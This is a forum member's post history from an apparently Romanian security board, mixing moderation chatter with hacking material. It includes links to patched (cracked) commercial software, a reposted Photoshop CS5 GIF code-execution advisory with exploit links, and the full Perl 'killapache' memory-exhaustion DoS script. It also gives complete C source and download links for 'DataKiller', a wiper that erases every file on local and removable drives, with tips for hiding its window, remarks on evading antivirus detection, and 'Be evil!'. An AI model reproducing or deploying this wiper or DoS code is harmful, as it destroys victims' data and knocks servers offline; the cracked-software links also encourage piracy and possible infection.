Nytro - Administrators - Posts: 18794 - Days Won: 742

Everything posted by Nytro

  1. No, I haven't really been home, I haven't had time to log in. Anyway, I'll only log in in the evening when I'm not going out somewhere. I can't give a specific hour...
  2. No, you apply for nothing if you know nothing about the field in question; you can't work on a project and you don't learn anything that way either. At recruitment, questions from the respective fields are asked and only those who can handle them are accepted.
  3. Pff, these sites often don't look good; maybe they don't have good bots, maybe they don't work correctly... As a suggestion, check multiple sources.
  4. Yes, we're not 7 years old, to not be allowed to swear or to hear (see) vulgar words. I know it's bothersome sometimes, but we can't change a way of life. Besides, pretty much all of us use such words in everyday life, we're used to such language, so I don't think there are problems; you'll have to adapt, to disregard them, I don't think it's any problem. Topic closed.
  5. No "Group" is added. They are not "administrators of the Windows group", they are "Windows administrators". And there is no confusion; you can see that "Linux Administrator" is not the same thing as "Administrator" (whoever can't see it should buy glasses). Avoid useless comments. @ady_adam: We make "any" group, as volunteers come forward for that group. I may make a "Trolls" group, only those in that group will also be part of the "Banned users" group.
  6. VanDyke Secure CRT SecureCRT combines rock-solid terminal emulation with the strong encryption, data integrity, and authentication options of the Secure Shell protocol. SecureCRT provides secure remote access, file transfer, and data tunneling for everyone in your organization. It looks roughly like this: Features: http://www.vandyke.com/products/securecrt/features.html Download from the official site (Windows, Linux, Mac): http://www.vandyke.com/download/securecrt/download.html You use it to connect remotely via telnet, SSH and others. It has a few useful options. I don't know whether the patched version is infected; I use it and haven't had problems. Download with patch: http://www.multiupload.com/04G0P5KLF0
  7. Even better: http://rstcenter.com/forum/39386-powergrep-4-a.rst
  8. PowerGREP is a powerful Windows grep tool. Quickly search through large numbers of files on your PC or network, including text and binary files, compressed archives, MS Word documents, Excel spreadsheets, PDF files, OpenOffice files, etc. Find the information you want with powerful text patterns (regular expressions) specifying the form of what you want, instead of literal text. Search and replace with one or many regular expressions to comprehensively maintain web sites, source code, reports, etc. Extract statistics and knowledge from logs files and large data sets. Very useful for searching in files based on regular expressions; it isn't hard to use at all and it has a ton of options. I don't know whether it's infected; I use it and haven't had problems. Screenshot from the official site: http://www.powergrep.com/screens/powergrep.png It's portable, it doesn't need to be installed. Download: http://www.multiupload.com/Q5VT2RWE8Y
  9. Adobe Photoshop CS5 GIF Remote Code Execution

      Application: Adobe Photoshop CS5 GIF Remote Code Execution
      Platforms: Adobe Photoshop CS5 (12.0 and 12.1)
      Exploitation: Remote code execution
      CVE Number: CVE-2011-2131
      Adobe Vulnerability Identifier: APSB11-22
      {PRL}: 2011-08
      Author: Francis Provencher (Protek Research Lab's)
      Website: http://www.protekresearchlab.com/
      Twitter: @ProtekResearch

      1) Introduction
      2) Timeline
      3) Technical details
      4) PoC

      1) Introduction

      Adobe Photoshop is a graphics editing program developed and published by Adobe Systems Incorporated. Adobe's 2003 "Creative Suite" rebranding led to Adobe Photoshop 8's renaming to Adobe Photoshop CS. Thus, Adobe Photoshop CS5 is the 12th major release of Adobe Photoshop. The CS rebranding also resulted in Adobe offering numerous software packages containing multiple Adobe programs for a reduced price. Adobe Photoshop is released in two editions: Adobe Photoshop, and Adobe Photoshop Extended, with the Extended having extra 3D image creation, motion graphics editing, and advanced image analysis features. Adobe Photoshop Extended is included in all of Adobe's Creative Suite offerings except Design Standard, which includes the Adobe Photoshop edition.
      http://en.wikipedia.org/wiki/Adobe_Photoshop

      2) Timeline

      2011-06-14 - Vulnerability reported to vendor
      2011-09-09 - Coordinated public release of advisory

      3) Technical details

      This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe PhotoShop CS5. User interaction is required to exploit this vulnerability in that the target must open a malicious GIF file. When the "ushort ImageHeight" is crafted with an invalid value the memory is corrupted and arbitrary code can be run on the remote host.

      4) The Code

      http://www.protekresearchlab.com/exploits/PRL-2011-08.gif
      http://exploit-db.com/sploits/17712.zip

      Source: Adobe Photoshop CS5 GIF Remote Code Execution

      When I get home I'll test it too, I think I had Photoshop CS5...
  10. Personal attacks, insults... are punished. If I don't see it (which is very possible, I don't have time to read all the posts) you can send me a PM and it gets resolved.
  11. I want links... A "plm" thrown in there doesn't bother me, I don't think it's a problem. If there are insults, yes, a warning is given. Well, in offtopic I don't bother giving warnings, I'm not very interested in that category. I want to see examples of posts with inappropriate language.
  12. New members of the groups: - Xander - PHP Coder - silvian0 - PHP Coder - Gecko - Designer - denjacker - Web Vulnerability Master - Leader I think 2 are on the waiting list; it remains to be seen these days whether or not they will be recruited.
  13. Offtopic, don't ruin the topic.
  14. Update: DataKiller v0.2 What's new: - Safe file delete See the first post for more information.
  15. I don't know if signatures are worth it, but if someone needs graphics, images or something else for a project, I think the Designers will be happy to help.
  16. geoRAT 3.0 And that's how we have a new VIP.
  17. Apache httpd Remote Denial of Service (memory exhaustion) #Apache httpd Remote Denial of Service (memory exhaustion) #By Kingcope #Year 2011 # # Will result in swapping memory to filesystem on the remote side # plus killing of processes when running out of swap space. # Remote System becomes unstable. # use IO::Socket; use Parallel::ForkManager; sub usage { print "Apache Remote Denial of Service (memory exhaustion)\n"; print "by Kingcope\n"; print "usage: perl killapache.pl <host> [numforks]\n"; print "example: perl killapache.pl www.example.com 50\n"; } sub killapache { print "ATTACKING $ARGV[0] [using $numforks forks]\n"; $pm = new Parallel::ForkManager($numforks); $|=1; srand(time()); $p = ""; for ($k=0;$k<1300;$k++) { $p .= ",5-$k"; } for ($k=0;$k<$numforks;$k++) { my $pid = $pm->start and next; $x = ""; my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; while(<$sock>) { } $pm->finish; } $pm->wait_all_children; print ":pPpPpppPpPPppPpppPp\n"; } sub testapache { my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0], PeerPort => "80", Proto => 'tcp'); $p = "HEAD / HTTP/1.1\r\nHost: $ARGV[0]\r\nRange:bytes=0-$p\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n"; print $sock $p; $x = <$sock>; if ($x =~ /Partial/) { print "host seems vuln\n"; return 1; } else { return 0; } } if ($#ARGV < 0) { usage; exit; } if ($#ARGV > 1) { $numforks = $ARGV[1]; } else {$numforks = 50;} $v = testapache(); if ($v == 0) { print "Host does not seem vulnerable\n"; exit; } while(1) { killapache(); } Looks promising... Source: Apache httpd Remote Denial of Service (memory exhaustion)
  18. Florin Salam - Cap si pajura 2011 (Live Club One Million Timisoara) - YouTube
  19. I thought about the option to exclude the Windows partition. But there may be other files there too. I think I'll add an option to skip ?:/Windows and ?:/Program Files, since Documents And Settings still holds data, as does /Users on Windows 7. But I think I'm complicating things for nothing. I'll think about it some more, and when I have more free time I'll work on it some more.
  20. Whoever wants to be recruited into that group, add "grupuri_rst" and we'll talk. And we'll also see how much they understand of what they're doing.
  21. It won't "cause a sensation", it will just be more complex and more useful. I'm waiting for ideas and suggestions; as for the implementation, those in the C/C++ coder group will be able to contribute.
  22. No, VIP is something else.
  23. Yes, I'm sure that if they see "[G] Java Programmer" instead of "Java Programmers", even if it's the first time they visit RST they'll say: "Aaaa, right, now I know, it's about those groups I don't know about, but "G" comes from groups and that cleared it up for me". There's no point; maybe I'll put italics, a distinct style on them; for now it's not necessary.
  24. "Registered user" != "Java Programmer" != "VIP" And if you have a child who can't read take a look, they'll realize it's not the same thing. PS: Those with the VIP rank now have the group's status (Linux...), but also the VIP permissions.
  25. Name: DataKiller Description: Deletes all files Author: The C/C++ Coder group @ Romanian Security Team Size: 8.5 KB Warning! Do not run this executable, it will try to delete all files! A more detailed description: some time ago, someone asked me for such a program and it seemed like an interesting idea. It's the second version; I plan to add a few useful options (to delete only the pictures, for example). What's new: - Safe File Delete It's nothing complicated, but it can be very useful. The only thing it does is replace all the data in the files that are about to be deleted with NULL. Thus, a file containing "aaa" will contain "NULL,NULL,NULL" and then be deleted. In case you didn't know, when you Delete a file, the data in the file is not erased; only the link to that file is removed, but the data remains on the hard disk and can be partially or fully recovered. With this option it can no longer be recovered, but the program's execution will be MUCH longer and will consume more resources. It will take over 30 minutes, depending on the size and number of files on the computer. I estimate one run would take about 1-2 hours. And anyway I have a few ideas for the future. It's the only option implemented, but as can be seen in the source I have a few more ideas to put into practice. There's no point in hiding the source code; the problem would be that it isn't extraordinarily well written, I didn't make an effort to do optimizations.
DataKiller.c /* Name: DataKiller.c Description: Delete all deletable files Authors: C/C++ Coder group @ Romanian Security Team Info: Not all options have been implemented */ #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> /* User-defined settings - you can change the values */ int safe_file_delete = 1; /* "-[n]sf" Delete the file so that it cannot be recovered */ int safe_delete_file_info = 0; /* "-[n]si" Also delete the information about the file */ int delete_all_files = 1; /* "-[n]da" Delete all files */ int delete_all_images = 1; /* "-[n]di" Delete all images */ int delete_all_media = 1; /* "-[n]dm" Delete all songs and videos */ int delete_all_documents = 1; /* "-[n]dd" Delete all documents */ int exclude_windows_partition = 0; /* "-[n]ew" Do not delete anything from the Windows partition */ /* Buffer sizes */ #define VOLNAME_SIZE 4 #define VOLBUFFER_SIZE 1337 #define DIRBUFFER_SIZE 255 #define FILENAME_SIZE 31337 /* Counters for the number of files and folders - statistics */ int nr_files = 0; int nr_directories = 0; int deleted_files = 0; int deleted_directories = 0;
/* The function replaces the data in a file with 0 (NULL) */ void NullFile(const char *fisier) { HANDLE hFisier = NULL; DWORD file_size = 0; DWORD file_size_2 = 0, written = 0; unsigned char *buf = NULL; SetFileAttributes(fisier, FILE_ATTRIBUTE_NORMAL); hFisier = CreateFile(fisier, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_ARCHIVE | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_NORMAL | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_SYSTEM, NULL); if(hFisier != INVALID_HANDLE_VALUE) { file_size = GetFileSize(hFisier, &file_size_2); /* Null out the file so the data cannot be recovered */ buf = (unsigned char *)malloc(file_size); memset(buf, 0, file_size); WriteFile(hFisier, buf, file_size, &written, NULL); free(buf); CloseHandle(hFisier); } } /* Recursive function, deletes folders and files */ void DeleteFiles(char *directory) { WIN32_FIND_DATA file_data; HANDLE hFisier; int new_file = 1; char dir_buffer[DIRBUFFER_SIZE] = {0}; char file_name[FILENAME_SIZE] = {0}; char new_dir[DIRBUFFER_SIZE] = {0}; /* Build the string for FindFirstFile */ memset(&file_data, 0, sizeof(WIN32_FIND_DATA)); sprintf(dir_buffer, "%s*", directory); hFisier = FindFirstFile(dir_buffer, &file_data); /* Walk the folder */ while(hFisier != INVALID_HANDLE_VALUE && new_file) { sprintf(file_name, "%s%s", directory, file_data.cFileName); /* If it is a folder */ if(GetFileAttributes(file_name) & ~(FILE_ATTRIBUTE_DIRECTORY ^ 0xFFFFFFFF) && (GetFileAttributes(file_name) != (unsigned)-1)) { sprintf(new_dir, "%s\\", file_name); /* Skip "." and ".." */ if(file_name[strlen(file_name) - 1] != '.') { nr_directories++; DeleteFiles(new_dir); if(RemoveDirectory(new_dir)) deleted_directories++; } } /* If it is a file */ else { nr_files++; if(safe_file_delete) NullFile(file_name); if(DeleteFile(file_name)) deleted_files++; } /* Move on to the next file/folder */ new_file = FindNextFile(hFisier, &file_data); } FindClose(hFisier); }
int main(int argc, char *argv[]) { char *dir_buffer = NULL; char **drives = NULL; int dir_buf_size = 0, nr_drives = 0, i = 0, a = 0; /* Check the command-line parameters */ if(argc > 1) { for(a = 1; a < argc; a++) { /* Take each parameter in turn */ if(strcmp(argv[a], "-sf") == 0) safe_file_delete = 1; else if(strcmp(argv[a], "-nsf") == 0) safe_file_delete = 0; else if(strcmp(argv[a], "-si") == 0) safe_delete_file_info = 1; else if(strcmp(argv[a], "-nsi") == 0) safe_delete_file_info = 0; else if(strcmp(argv[a], "-da") == 0) delete_all_files = 1; else if(strcmp(argv[a], "-nda") == 0) delete_all_files = 0; else if(strcmp(argv[a], "-di") == 0) delete_all_images = 1; else if(strcmp(argv[a], "-ndi") == 0) delete_all_images = 0; else if(strcmp(argv[a], "-dm") == 0) delete_all_media = 1; else if(strcmp(argv[a], "-ndm") == 0) delete_all_media = 0; else if(strcmp(argv[a], "-dd") == 0) delete_all_documents = 1; else if(strcmp(argv[a], "-ndd") == 0) delete_all_documents = 0; else if(strcmp(argv[a], "-ew") == 0) exclude_windows_partition = 1; else if(strcmp(argv[a], "-new") == 0) exclude_windows_partition = 0; } } /* Allocate memory */ dir_buffer = (char *)malloc(VOLBUFFER_SIZE); dir_buf_size = GetLogicalDriveStrings(VOLBUFFER_SIZE, dir_buffer); nr_drives = dir_buf_size / VOLNAME_SIZE; drives = (char **)malloc(sizeof(char *) * nr_drives); /* Walk the volumes */ for(i = 0; i < dir_buf_size / VOLNAME_SIZE; i++) { drives[i] = (char *)malloc(VOLNAME_SIZE); strncpy(drives[i], dir_buffer + i * VOLNAME_SIZE, VOLNAME_SIZE); printf("Drive: %s: %d\n", drives[i], GetDriveType(drives[i]));
if(GetDriveType(drives[i]) == DRIVE_FIXED || GetDriveType(drives[i]) == DRIVE_REMOVABLE) DeleteFiles(drives[i]); } printf("Foldere: %d\nFisiere: %d\n", nr_directories, nr_files); printf("Foldere sterse: %d\nFisiere sterse: %d\n", deleted_directories, deleted_files); /* Free the memory */ for(i = 0; i < nr_drives; i++) free(drives[i]); free(drives); free(dir_buffer); return 0; }
Pastebin: [C] DataKiller.c - Pastebin.com If you want to compile it, compile it with the "-mwindows" linker option, so that CMD doesn't open when it is run. I also compiled it with size optimizations "-s" and "-Os". Usage? I think you'll find one for it; I think there will be plenty who find it "useful". The bad part, from what I can see, is that it's detectable... http://www.virustotal.com/file-scan/report.html?id=b0d3d314fa0de3e4041e16525017a7960641a089cd7bf5a887ccb9ec53d935df-1313949171 I'll work on this aspect too. The point is that you can compile it from source, so you don't think I posted something else. Download: http://www.girlshare.ro/2529741.5 http://www.speedyshare.com/files/29969756/DataKiller.exe http://www.megaupload.com/?d=S88LSQH1 http://www.mediafire.com/?ti4gvi9nnj7g91q http://www.multiupload.com/DOTY3PVTX3 I know, it's trivial, stupid and unethical; I don't need something like this but some people might. Be evil!